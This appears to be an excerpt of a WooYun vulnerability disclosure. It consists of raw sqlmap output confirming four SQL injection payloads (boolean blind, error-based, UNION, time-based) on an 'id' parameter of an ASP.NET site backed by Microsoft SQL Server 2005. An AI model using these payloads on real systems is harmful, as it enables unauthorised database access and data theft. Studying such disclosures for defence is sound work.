WooYun.org

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection points with a total of 59 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=8a8889a0504ad14d01516bab606c584e' AND 1517=1517 AND 'wyQq'='wyQq
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=8a8889a0504ad14d01516bab606c584e' AND 8651=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(112)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (8651=8651) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113))) AND 'aExn'='aExn
    Type: UNION query
    Title: Generic UNION query (NULL) - 16 columns
    Payload: id=-1600' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(122)+CHAR(112)+CHAR(120)+CHAR(113)+CHAR(103)+CHAR(76)+CHAR(103)+CHAR(81)+CHAR(65)+CHAR(107)+CHAR(68)+CHAR(118)+CHAR(80)+CHAR(88)+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: id=-5928' OR 4638=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'zhXY'='zhXY
---
[15:20:04] [INFO] testing Microsoft SQL Server
[15:20:15] [INFO] confirming Microsoft SQL Server
[15:20:56] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005